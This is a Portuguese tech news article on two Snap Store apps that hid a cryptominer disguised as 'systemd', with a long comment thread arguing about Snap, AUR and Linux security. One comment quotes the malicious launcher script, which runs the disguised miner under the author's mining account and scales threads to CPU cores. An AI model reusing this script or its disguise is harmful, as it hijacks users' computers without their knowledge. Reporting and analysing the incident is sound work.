Proponha uma correção, faça uma sugestão
Cuidado: A loja de apps do Ubuntu também tem malware
Todos reconhecem no Linux uma segurança elevada e até maior que nos restantes sistemas operativos. A sua comunidade tem um papel importante ao desenvolver este sistema e as suas aplicações de forma aberta.
É claro que não é um sistema isento de problemas e, por vezes, até bem graves. O mais recente problema vem diretamente para o Ubuntu e para a sua loja de apps. Não é normal, mas foram encontradas apps com malware.
A mais recente forma de distribuir aplicações no Ubuntu é através de pacotes Snap. Este formato tem características específicas, quer ao nível da segurança quer da forma como interage com o próprio Ubuntu tem-se tornado o padrão da indústria e está em várias outras distribuições, dada a forma simples como os programadores podem partilhar as suas apps, independentemente da plataforma.
Foi precisamente na loja de apps Snap da Canonical que foram encontradas 2 aplicações, aparentemente normais, mas que continham código (ByteCoin) destinado a minerar criptomoedas de forma invisível para os utilizadores. Esta "funcionalidade" estava disfarçada como o daemon "systemd".
Para além desta máscara, as aplicações carregavam ainda scripts de inicialização que se destinavam a colocar, de forma automática, o código malicioso em execução em segundo plano, onde ficava sem ser detetado.
A Canonical revelou que removeu todas as aplicações deste autor enquanto aguarda a realização de investigações para apurar o impacto que estas tiveram. As aplicações estavam disponíveis desde o final de abril.
À semelhança de outras lojas de aplicações, todo o código que é carregado para a Snap Store é validado. A questão é que estes são automáticos e limitam-se a validar a sua funcionalidade e a capacidade de ser instalada noutras distribuições, não sendo verificado o código de forma exaustiva.
A categorização de malware neste caso deve-se à presença de código e funcionalidades maliciosas sem que as mesmas estivessem anunciadas na descrição da app. Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.
Este artigo tem mais de um ano
Loading ...
Zero fontes?
Dizer que isto é malware, que é, mas dando a ideia que está ao nível de um trojan…
Podiam ter reforçado a segurança dos pactotes snaps
ah e tal, é seguro!
Ate parece que só existe o ubuntu no mundo GNU/Linux , mas descobriu-se o problema .
“Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”
A loja de aplicações do ubuntu é responsabilidade da canonical , e não do kernel Linux ou do sistema GNU .
Alias não é a primeira-vez tal acontece .
*100%
Quero dizer , o mais seguro possível .
Finalmente alguém com conhecimento e palavras louváveis a serem digitadas, ao que parece ter mais conhecimento que o próprio autor do artigo.
Concordo, e além disso, notícias destas no mundo linux são uma raridade, quando comparado com o que acontece em Windows. Obviamente que não existem sistemas imunes, mas eu não troco (ainda mais nos dias de hoje), os meus sistemas linux por outro qualquer.
Vejamos…
1. “Todos reconhecem no Linux uma segurança elevada e até maior que nos restantes sistemas operativos. A sua comunidade tem um papel importante ao desenvolver este sistema e as suas aplicações de forma aberta.”
Linux, NÃO é um sistema operativo!
Sistemas Operativos em que incorporam o Kernel, são as distribuições de Linux, as quais seguem os seus formatos padronizados de empacotamento!!
Uma vantagem desde já para os SO Open Source e para qualquer aplicação, em que este pode ser escrutinado de forma Livre, Directa, Imediata e Corrigido o mais Rapidamente possível.
2. ” … tem-se tornado o padrão da indústria e está em várias outras distribuições, dada a forma simples como os programadores podem partilhar as suas apps, independentemente da plataforma.”
O formato de empacotamento Snap, NÃO é padrão em NENHUMA distribuição de Linux. Uma coisa é poder ser usado…outra diferente é ser um PADRÃO.
No caso especifico da distribuição Ubuntu Linux, o formato de empacotamento PADRÃO e como é um derivado do Debian Linux é o formato .deb e NÃO…Snap.
3. “A questão é que estes são automáticos e limitam-se a validar a sua funcionalidade e a capacidade de ser instalada noutras distribuições, não sendo verificado o código de forma exaustiva.”
Aí está a verdade a começar a ver a Luz!
Contrariamente, ao que acontece, se fosse um pacote padronizado para as distribuições de Linux, OBRIGATORIAMENTE, tinha de passar pela auditoria de integridade desse mesmo pacote, neste caso no formato .deb, para ser colocado nos repositórios oficiais da distribuição em causa.
O que se passa no caso da Canonical, é que deseja dar tamanhas facilidades aos utilizadores da sua distribuição Ubuntu Linux, que no caso especifico desta nova forma de empacotamento, NÃO está a olhar a meios, desvirtuando a integridade da sua distribuição.
Mais uma razão para quem defende em que as distribuições de Linux, devem seguir os seus formatos de empacotamento PADRÃO, em detrimento de formatos de empacotamento “aligeirados”, aos quais NÃO existe controlo à data.
Nenhuma distribuição de Linux, recomenda a instalação de pacotes Snap em detrimento da sua forma de empacotamento previamente estabelecida para o seu SO, esta é a VERDADE.
E o mesmo pode vir a acontecer com o formato Flatpak…
4. “A categorização de malware neste caso deve-se à presença de código e funcionalidades maliciosas sem que as mesmas estivessem anunciadas na descrição da app.”
Em qual SO, as aplicações com malware, as quais são desconhecidas pelos utilizadores, se encontram descritas como tal, antes de serem instaladas?
5. “Cai assim por terra mais um mito do Linux e do Ubuntu, que garantiam a maior segurança das aplicações e da loja destas.”
Oura vez Linux?!?!
A Canonical, que aprenda, NÃO queira “IMPOR”, um formato de empacotamento NOVO, para o qual ainda não tem equipa para controlar devidamente o lançamento para a comunidade de utilizadores Ubuntu, esses tipos de pacotes.
Querem atingir o Nirvana, ainda vão parar no Limbo!!
No entanto, não deixa de ser curioso, se a noticia for lida com a máxima atenção, que este Badware como é designada esta nova forma de malware, em que o seu autor denota uma “ligeira” falta de esforço, para disfarçar estas aplicações nocivas, na medida em que faz a inclusão de um endereço de e-mail codificado em que menciona um Ferrari (myfirstferrari@protonmail.com).
Ver em…https://github.com/canonical-websites/snapcraft.io/issues/651#issuecomment-388546799
#!/bin/bash
currency=bcn
name=2048buntu
{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))
if (( $cores < 4 )); then
/snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 1
else
/snap/$name/current/systemd -u myfirstferrari@protonmail.com –$currency 2
fi
}
NOTA: vai ficar a dúvida, se pode ter sido a forma mais expedita para chamar a ATENÇÃO da Canonical, para um buraco no seu modelo de verificação do Snapcraft.
Não deixa de ser curioso também, que as boas praticas de instalação de pacotes em distribuições de Linux, NÃO recomendem que as aplicações a serem integradas, devemos utilizar da máxima cautela, sobre o tipo de software a ser instalado e sobre quais os locais de onde se instala.
Exemplo: PPAs, scripts de instalação compartilhado via GitHub, etc., etc.
CURIOSO: também não deixa de ser verdade que este bundleware, utiliza a licença do MIT, que permite que o mesmo seja distribuído como software proprietário, sem que para isso seja obrigado a ser disponibilizado o código fonte, desde que os direitos de autor sejam mantidos, como acontece neste caso.
Nunca usei Snap nem esses “pendericalhos” e NUNCA irei utilizar nas minhas distribuiçoes de Linux, pelo simples facto que NÂO existe uma verificaçao linha a linha de codigo suspeito, como acontece nos formatos de empacotamento padrao para as distribuiçoes de Linux.
Assim e para terminar, uma das GRANDES vantagens de se utilizar uma distribuição de Linux, software Open Source e Free Software, é precisamente a forma que temos de poder auditar TUDO e no menor espaço de tempo, disponibilizar, alertar, para que a solução para o problema seja resolvido o mais rápido possível.
Precisamente…e parabéns pelo post.1 abraço!!!!!!!!!
@SoulReaver…grato….1 abraço
@arc: excelente post.
@Pérolas….Obrigado
Se acha o sabichão, kkkkkkkkk
Snap!!! (risos)
Nada a fazer, a não ser reinventem a Internet, e legislem, sobre a mesma, com penalizações bem severas, e até fecho de sites, que infrinjam. Não é como o Facebook, que sai impune, e continua, fazendo o que quer. Parece-me que há aqui mãozinha dos Governos, protegendo, estas poucas vergonhas.
cá para mim são aliens…
Quem usa facebook em pleno 2018? Pff!
Onde é que anda o techmanja do Danilo agora?!
Uso BSD não Linux! Fiquem aí com seus snaps cheio de vírus!
Posso concluir por tanto que o ubuntu não é seguro… mas não faz mal, não o uso, por isso devo estar seguro.
Qual é o seguríssimo sistemas que usas? Appl€ (LOL), Window$ (LOL)? Não nenhum sistema que seja 100% infalível, agora o que há é sistemas com menos incidências e mais seguros que outros! Uma das coisas piores do código-fechado (appl€ e window$) é o FACTO de conterem bugs que são explorados anos a fio e outros que tu nem sabes que existem e são explorados à ganância e tudo isto porque o código-fonte não pode ser validado! Um «risco na pintura» não é o mesmo que um «queijo suiço» chamado código-fechado.
Não entendes ironia ?
Tens a certeza que estas seguro? Caso não saibas o linux continua a ser mais seguro que os outros sistemas operativos. Na apps stores aparecem todo tipo de apps mas como eu só uso Synaptic Pakage Manager (a primeira app store do mundo).
Synaptic não é nenhuma app store , é um gestor de software .
Pacotes Snap são executados em sandBox…. sim pode por uma maquina a minerar.. mas como uso fedora com Selinux sem a minha ordem e autorização especifica, duvido que “”contamine “” um bom gnu/linux.
Informem-se primeiro o que é e como funciona uma snap app. E já agora agora explicassem no artigo tambem qual a diferença entre um malware e minerar criptomoedas. 😉
Linux Fedora 🙂 ahaha 🙂 Não há trojan, malware, virus .. nada!
Ué, mas não era o Linux o sistema perfeito?? Que não tinha vírus e humilhava o Windows e Mac? Ora pois, tou a rir.
leia entao o que esta escrito acima pelo arc antes de rir …
Continuo a rir, kkkkkkk.
Pois isso vai muito além dos snaps! Pelo visto o pplware não quis falar do “resto” pra não sujar mais a imagem do adorado “Ubuntu”.
Os Ubuntudos fazem a festa.
Que “resto”?
Ubuntu nao e a unica distro, existem outras … alem disso dizer que “ha mais” e nao dizer o que … e no minimo so por si razao para rir …
Elabore entao !
Also disso isto nao e malware, nem virus nem nada que se parece, trata-se de aproveitar que nao existe grande controlo nos SNAPS sobre o que o pacote faz e neste caso foi adicionado um “bonus” … continuo a achar que nao sabe do que esta a falar, para se estar assim a “rir”
Vc tá falando das novas falhas Spectre que não corrigiram no Linux?
Mas ainda dão resposta ao pia?
De certeza que encontram algo melhor que faz.
Fazer e não faz
“”Ué, mas não era o Linux o sistema perfeito??””
se usa uma distro vendida a “MS,Canonical$$$” ou made in ch o problema é teu.
quem usa linux Gosta mesmo é de PURO OSS. ArchLinux ou uma distro com suporte valido REL,Fedora, e sim o selinux tem backdoors, mas a segurança tem um preço, não há almoços grátis.
Se é seguro ……. Lol os outros são melhores.
BSD é muito melhor, aceitem logo
No Archlinux se utilizar o AUR package também há riscos como o SNAP.
Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
“Pacote sem suporte, potencialmente perigoso.”
@adermit, importa-se de nos elucidar a todos, com um exemplo prático, da sua máquina onde executa o Arch Linux?
Portanto, para si, SEMPRE que se instala um pacote via AUR:
“Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
“Pacote sem suporte, potencialmente perigoso.” ”
Sabe, eu gosto de ver para acreditar, mas só com exemplos reais.
Conforme documentação sobre pacote do Repositório de Usuário do Arch , também conhecido como AUR:
https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)
São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.
O problema desse arc é que é defensor ferrenho do Arch Linux, até o nome dele “arc”, deve ser do “Arch”. Ridículo.
@Danilo, EU..NÃO utilizo só Arch Linux, utilizo também Linux Mint, CentOS e Debian Linux, por necessidades que NÃO tenho de lhe dar explicações.
POR ISSO…NÃO …ESCREVA sobre o que NÃO SABE, a respeito do que EU DEFENDO ou NÃO.
E se for ler mais os meus comentários, também aponto as CRITICAS, quando existe FUNDAMENTO e COM PROVAS devidamente fundamentadas da minha autoria e assentes em documentação CREDÍVEL existente e sempre que seja possível com exemplos das minhas máquinas!!!!
Mas voltando a SI, NÃO deixa de ser CARICATO, exercer o seu poder de critica, e NÃO OLHAR PARA para O QUE ANDA A DIZER pelo Pplware, sobre:
“O problema desse arc é que é defensor ferrenho do Arch Linux, até o nome dele “arc”, deve ser do “Arch”. Ridículo.”
REPARE PARA OS SEUS COMENTÁRIOS:
Use BSD então! Mas nem todos tem capacidade de usá-lo, é para bem poucos,
enquanto isso fique no seu Windows achando que está seguro.
(https://pplware.sapo.pt/informacao/windows-ou-macos-para-que-instale-o-linux-manjaro-8/#comments)
Uso BSD não Linux! Fiquem aí com seus snaps cheio de vírus!
(https://pplware.sapo.pt/linux/loja-apps-ubuntu-malware/#comments)
BSD é muito melhor, aceitem logo
(https://pplware.sapo.pt/linux/loja-apps-ubuntu-malware/#comments)
Afinal, o RIDÍCULO….é… VOCê!!!!
@Danilo, sobre isto: “até o nome dele “arc”, deve ser do “Arch”. Ridículo.”
É tão VERDADE….arc se encontrar ligado a Arch Linux, como você utilizar BSD nas suas máquinas!!!
Ué, mas você tá sempre a defender o Arch Linux. Sempre que alguém fala alguma coisa sobre o Arch o primeiro a comentar é você. Já meu nome, nada tem a ver com utilizar o BSD.
Deixa esse arco da velha pra lá
Quem bom saber que você pensa o mesmo. BSD é muito melhor! Ridículo é usar uma distro como Arch. Se quiser respeito no Linux, use Slackware ou Gentoo. Arch Linux virou até meme internacional e é ridicularizado em qualquer lugar.
@Danilo…
“mas você tá sempre a defender o Arch Linux. Sempre que alguém fala alguma coisa sobre o Arch o primeiro a comentar é você.”
Tem a certeza que sou SEMPRE o primeiro a defender o Arch nos comentários?
https://pplware.sapo.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-7/#comments
https://pplware.sapo.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-6/
https://pplware.sapo.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-4/
https://pplware.sapo.pt/linux/windows-ou-macos-para-que-instale-o-linux-manjaro-3/#comments
NOTA: este acima, até foi um mode para o Manjaro Linux, passar a Arch Linux puro!
https://pplware.sapo.pt/linux/linux-manjaro-2/#comments
NOTA: este acima é uma correcção ao link para download
“Já meu nome, nada tem a ver com utilizar o BSD.”
Mas você, alguma vez utilizou um BSD, em alguma máquina de produção, faz ideia do que fala, tem conhecimentos mínimos de sua autoria que sejam credíveis de tal feito.
Você e outros aqui, só estão cá para os Clickbaits…e pouco mais.
Quais os seus comentários CREDÍVEIS, que tem brindado o Pplware, vindos da sua lavra?
Onde está a sua experiência de BSD user, vertida em factos, para que todos os interessados possam APRENDER, com os seus ensinamentos?
Voce …é um simpatico APRENDIZ….
https://pplware.sapo.pt/linux/chegou-o-trueos-18-03-nunca-foi-tao-facil-usar-o-freebsd/
Já teve o tempo de antena comigo, agora…é para dev/null.
OK… e fim de linha!!!!
Manjaro Linux é baseado no Arch mas não é Arch. É apenas um Arch pra newbies. Tipo o que o Ubuntu é/era do Debian.
Quanto a falar do Arch, sempre vejo você comentando sobre ele, mas eu, diferente de você não vou ir no site fica caçando por notícias que você comentou no passado. Tenho bem mais o que fazer.
E eu uso BSD e estou feliz com ele. Não tenho nada a dizer, nem a ensinar, quem quer aprender que leia a documentação por si só! Não vou fazer o papel de professor, se você está esperando comentários assim, vai ficar esperando sentado.
Sou só um comentarista desse site, assim como de outros, não procuro fazer parte de uma hierarquia, nem de panelinha. Estou pouco me lixando para isso.
E você é RIDÍCULO.
@adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:
“Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.”
EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.
Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:
Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.
PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!
Meu caro, NÃO INSISTA:
“São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”
POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.
Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!
MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:
[arc@zeus-orbital ~]$ yaourt -S pacui
[sudo] password for arc:
a resolver dependências…
a procurar pacotes em conflito…
Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1
Tamanho Total Instalado: 3,10 MiB
:: Continuar a instalação? [S/n]
(2/2) a verificar chaves no chaveiro [######################] 100%
(2/2) a verificar integridade dos pacotes [######################] 100%
(2/2) a carregar ficheiros dos pacotes [######################] 100%
(2/2) a verificar conflitos em ficheiros [######################] 100%
(2/2) a verificar espaço disponível no disco [######################] 100%
:: A processar modificações do pacote…
(1/2) a instalar fzf [######################] 100%
Dependências opcionais para fzf
fish: fish keybindings
tmux: fzf-tmux script for launching fzf in a tmux pane
vim: plugin
zsh: zsh keybindings [instalado]
(2/2) a instalar pacui [######################] 100%
Dependências opcionais para pacui
pacaur: Needed for AUR support. [instalado]
yaourt: Needed for AUR support. [instalado]
yay: Needed for AUR support.
pikaur: Needed for AUR support.
trizen: Needed for AUR support.
pacman-mirrors: Needed for Arch Linux mirror support [instalado]
reflector: Needed for Arch Linux mirror support
downgrade: Needed for hidden “downgrade” option.
:: A correr os hooks de pós-instalação…
(1/1) Arming ConditionNeedsUpdate…
[arc@zeus-orbital ~]$
Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.
Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.”
ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?
Isso não acontece ao se instalar o Google Chrome via AUR. Sempre pede pra editar o PKGBUILD e não sei mais o que… Bem chatinho, inclusive eu utilizo o Pamac, é bem mais bonito que fica digitando comandos numa tela preta.
Faça aí no seu Arch –> yaourt -S google-chrome
https://youtu.be/efzh-emcn3I?t=423
Prefiro utilizar a GUI (Pamac) que usar o terminal, é mais prático e rápido que ter que dá um monte de comandos e “sim”, “não”, “sim”, “não” só pra confirmar uma mera instalação. Parece o ruindows com next, next, install, rsrsrsrs.
Muito complicado, por exemplo, instalar Vivaldi via yaourt.
Pede pra editar o PKGBUILD
vivaldi 1.15.1147.42-1 (2018-05-14 14:21)
( Pacote sem suporte: Potencialmente perigoso ! )
==> Editar PKGBUILD ? [S/n] (“A” para abortar)
Depois pede pra compilar o pacote
==> Continuar a compilação de vivaldi ? [S/n]
Depois ainda pede mais coisa, custa digitar um só comando e instalar de uma vez? Quem é novato vai ficar perdidinho usando o yaourt. Melhor usar o Pamac, pois até mesmo o Octopi é chato na hora de confirmar a instalação do pacote, faz o mesmo processo via terminal.
Já instalei alguns programas do repositorio AUR, como android studio, spotify, sublime text, e sempre no Output aparecia um alerta em vermelho.
https://cdn5.linuxsecrets.com/media/xt-adaptive-images/480/images/2014/0603/snagit/sublime_text_3_AUR.png
https://wiki.manjaro.org/index.php?title=File:Yaourtdownload.png
https://semanickzaine.files.wordpress.com/2017/10/arch-labs-linux-minimo_2017-10-02-26_1355x682.png?w=730
@ademirt, isso é um falso positivo mesmo. Sem impacto no SO.
Não existem reports de problemas ao nivel de impacto no sistema.
@adermit, mesmo por desconfiança, nao deixa de ser interessante a informação do output.
Fica a advertência, para quem não confiar…não instalar.
Como disse e escrevi, NÃO tive até ao momento, qualquer problema.
No entanto, NÃO quer dizer que não possa existir, contudo dá sempre a possibilidade de abortar e além do mais, permite verificar em tempo real, possíveis problemas, algo que outros instaladores de pacotes em vários SOs, não dão oportunidade.
Estranho @arc,
Você postou um exemplo de um output para provar que eu menti e ainda
escreveu:
”
Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!
”
Você fez no seu arch: yaourt – S google-chrome ???????????
Apareceu o alerta ? em vermelho piscando ??? talvez você não percebeu.
Acho que esse alerta deveria estar com letras maiores. Vou sugerir para a comunidade o Arch.
Faz o yaourt em outros pacotes, tem muitos, por exemplo: spotify, linux-zen, sublime-text.
Falso positivo ?!?!? Como você é ingênuo.
Vou citar um trecho da documentação sobre o AUR :
https://wiki.archlinux.org/index.php/Arch_User_Repository_(Português)
” … são totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco. ”
Atente-se a este detalhe: não foram examinados completamente.
Sabe por que pode haver riscos quando for instalar um pacote do repositório AUR ?
Eu posso disponibilizar um driver, um editor, um jogo, ou qualquer outro tipo de programa no repositório AUR, e junto com este pacote um malware, por exemplo um minerador.
Muita atenção aqui:
Não são examinados completamente, conforme escrito na documentação do AUR, certo ?
E aí, quando uma pessoa por exemplo você, for tentar fazer:
yaourt -S EDITOR_DO_ADEMIRT__PODE_CONFIAR
Vai instalar o editor e executar o meu script malicioso.
@Wilber, PKGBUILDs apesar de serem “simples scripts” de shell, são bem mais complexos do que pode parecer e fazem a interacção com o makepkg.
Veja sempre o AUR, como sendo um repositório de PPAs., sempre será o seu ultimo recurso!!!
Arc vc é muito inteligente , poderia me dizer se é seguro baixar o pacote dropbox da AUR?
Só tem ele na AUR
https://aur.archlinux.org/packages/dropbox
@Wilber, também estou curioso.
@arc, até o momento você se baseou no:
[arc@zeus-orbital ~]$ yaourt -S pacui
Quando você provou colocando um output e afirmando que não tem riscos.
Lembre-se, que você afirmou que:
” …. Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!! … ”
E a package que está no AUR, –> teamviewer
@Wibert e ademirt…
Realmente, está a aparecer a mensagem no yaourt “Pacote incompatível: Potencialmente perigoso!”
em alguns pacotes e corresponde à VERDADE.
Todavia isso em nada afecta a integridade do sistema.
Por exemplo, se forem instalar essas aplicaçoes via pacman, NÃO existe essa Informação.
Se forem instalar essas mesmas aplicaçoes via pacli ou pacui, NÃO existe essa informãção.
Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA
Não afeta a integridade, mas nada impede que eu coloque um pacote no AUR contendo um script malicioso .
Entende ?
…continuando…
Se forem verificar o forum do Arch Linux, queiram por favor pesquisar por PROBLEMAS de falta de SEGURANÇA, NÃO existem relatos sobre IMPLICAÇÕES DE SEGURANÇA no SO.
Não acham estranho, o yaourt reportar em alguns pacotes essa mesma mensagem, e nas restantes aplicações que permitem a instalação de pacotes do AUR, como seja o caso do Pacli e do Pacui, que são wrappers interactivos para o pacman e para o yaourt?
AUR é mais perigosa que PPA
Eu disse desde o início, assim como o SNAP, no Yaourt também tem riscos, eu NÃO afirmei que o Arch foi afetado por problemas de segurança.
Entende?
@Wilbert e ademirt….ora queiram ver onde são apresentados os problemas de aplicações relacionadas com SEGURANÇA….https://security.archlinux.org/
E agora?
Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview, etcher, vivaldi.. e outros pacotes..
Vou ser mais simples para você entender:
O AUR não é o problema.
O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote contendo malware, pois estes pacotes não são examinados oficialmente.
Eu também uso archlinux e ubuntu, mas parece que os Linux-lovers usam Antolhos.
@ademirt
Primeiro, EU não uso Manjaro, e SIM… Arch Linux.
Mas para este caso, NÃO interessada.
Estamos a conversar sobre o AUR e este é transversal ao Arch e a todos os derivados do Arch.
“Não tem nada informando sobre o Dropbox, Sublime Text, Andoid Studio, Teamview,
etcher, vivaldi.. e outros pacotes..”
TEM pois!
Índice de Popularidade, Votação, etc., e MUITO importante…os COMENTÁRIOS sobre a aplicação.
“O AUR não é o problema.”
Claro que o AUR, é o PROBLEMA. Sendo o local onde são alocadas as aplicações da comunidade que realizam o envio das suas aplicações…É o PROBLEMA!!
“O problema é: qualquer pessoa pode disponibilizar no repositório aur algum pacote
contendo malware, pois estes pacotes não são examinados oficialmente.”
A possibilidade pode existir sempre, mas será mesmo que essa aplicação ou conjunto de aplicações vai ser disponibilizada, para utilização comunitária?
Mesmo no AUR, os Trusted Users, realizam auditoria às aplicações, e isso está descrito
nas guidelines do AUR.
Ler…https://wiki.archlinux.org/index.php/AUR_Trusted_User_Guidelines
No entanto, NADA é INFALÍVEL como sabemos, e uma das vantagens é que em ultima instância quem manda é o USER!
Mas também NÃO vejo o problema, em caso de “MEDO”, nada como ir às sources
(desde que disponível)…download, descompactar, ler o readme, procedimentos
para compilaçao e instalar.
É assim que EU faço, quando DESCONFIO de algo.
NÃO existem sources, NAO À INSTALAÇAO!!!
Além do mais, NÃO é estranho uma aplicação como o yaourt, estar descontinuado desde 2017-07-19 20:22!?!?!
https://aur.archlinux.org/packages/yaourt/
Além do mais, NÃO é estranho uma aplicação como o packer, estar descontinuado desde 2015-08-08 14:16!?!?!
https://aur.archlinux.org/packages/packer/
Mas se existe perigo, o qual é POSSÍVEL, então porque razão o pacman, aplicação que
também “comunica” com o AUR, não informa desse facto, na opção DETALHES, quando se está a instalar via AUR?
E também NÃO deixa de ser VERDADE, que o AUR, NÃO se encontra disponível por defeito. Por alguma coisa dever ser, NÃO?
Certamente, é o user que o coloca disponivel, VERDADE?
Se o coloca disponível, porque NÃO vai ler a documentação e as seus POTENCIAIS PERIGOS, para o SO?
Como da mesma forma, em Debian e derivados, NÃ existem PPAs, quem os coloca é o…!!!
Claro que Arch Linux, NÃO é para TODOS e a “FARTURA” das facilidades de algumas distribuições em querem agradar a tudo e a todos, por vezes trás MUITOS PROBLEMAS e depois culpam as DISTRIBUIÇÕES, os formatos de empacotamento, etc.
Então ainda trás mais PROBLEMAS, aos utilizadores do CLICK -> NEXT CLICK -> NEXT!!
Então, se INFRINGEM as boas praticas, disponibilizadas pela distribuição, se NÃO lerem a documentação, se não possuem conhecimentos básicos para a resolução de problemas, estão á espera do que?
PROBLEMAS, nunca vão faltar,seja em que software for ou SO, sejam eles fechados ou Open Source.
Nos Open Source, ainda os podemos analisar, reportar o bug, nós mesmos arranjar o problema localmente, etc.
Portanto, o PROBLEMA ou o NÃO PROBLEMA, é SEMPRE o UTILIZADOR.
@arc, eu também uso o archlinux (puro) e o ubuntu.
Sabe o que é Antolhos? pois parece que os linux-lovers usam isto.
Dica: antolhos não é distribuição linux.
Desde o início eu havia escrito: No Archlinux se utilizar o AUR package também há riscos como o SNAP.
Porém VOCÊ discordou, veja o que você escreveu:
arc 18 de Maio de 2018 às 09:07
@adermit, NÃO RESPONDEU, COM VERDADE AO SEU COMENTÁRIO:
“Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.”
EU gostava de ver, um exemplo PRATICO, REAL, OBJECTIVO, de tal afirmação, acontecer na sua máquina com Arch Linux, ou com um qualquer derivado de Arch Linux.
Estou precisamente a falar dessa mensagem, e o OUTPUT de uma instalação de uma qualquer aplicação instalada via repositório AUR,…NUNCA será esse o OUTPUT:
Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.
PERCEBEU, OU DESEJA QUE EU LHE FAÇA UM …DESENHO?!?!
Meu caro, NÃO INSISTA:
“São totalmente não-oficiais e não foram examinados completamente, então eles devem ser usados por sua conta e risco.”
POIS, mas isso é totalmente diferente do OUTPUT, como você deu a entender.
Isso, é um ADVERTÊNCIA existente na documentação do AUR…e essa ADVERTÊNCIA ….NÃO APARECE EM CASO ALGUM, quando se instala qualquer pacote via repositório AUR!!!!
MAS EU VOU DAR, o EXEMPLO, para PROVAR QUE VOCÊ….MENTIU!!!:
[arc@zeus-orbital ~]$ yaourt -S pacui
[sudo] password for arc:
a resolver dependências…
a procurar pacotes em conflito…
Pacotes (2) fzf-0.17.3-2 pacui-1.10.2-1
Tamanho Total Instalado: 3,10 MiB
:: Continuar a instalação? [S/n]
(2/2) a verificar chaves no chaveiro [######################] 100%
(2/2) a verificar integridade dos pacotes [######################] 100%
(2/2) a carregar ficheiros dos pacotes [######################] 100%
(2/2) a verificar conflitos em ficheiros [######################] 100%
(2/2) a verificar espaço disponível no disco [######################] 100%
:: A processar modificações do pacote…
(1/2) a instalar fzf [######################] 100%
Dependências opcionais para fzf
fish: fish keybindings
tmux: fzf-tmux script for launching fzf in a tmux pane
vim: plugin
zsh: zsh keybindings [instalado]
(2/2) a instalar pacui [######################] 100%
Dependências opcionais para pacui
pacaur: Needed for AUR support. [instalado]
yaourt: Needed for AUR support. [instalado]
yay: Needed for AUR support.
pikaur: Needed for AUR support.
trizen: Needed for AUR support.
pacman-mirrors: Needed for Arch Linux mirror support [instalado]
reflector: Needed for Arch Linux mirror support
downgrade: Needed for hidden “downgrade” option.
:: A correr os hooks de pós-instalação…
(1/1) Arming ConditionNeedsUpdate…
[arc@zeus-orbital ~]$
Este é o OUTPUT…TOTAL da instalação de um pacote em Arch Linux, via repositório AUR, com o yaourt.
Está PROVADO, que o que AFIRMOU (Aliás, quando se instala um pacote do AUR (yaourt -S xxxx) , o sistema já alerta:
Pacote sem suporte, potencialmente perigoso.”
ONDE ESTÁ ESSE TAL…ALERTA NO MOMENTO DE INSTALAÇÃO OU NO FINALIZAÇÃO DESSA INSTALAÇÃO?!?!?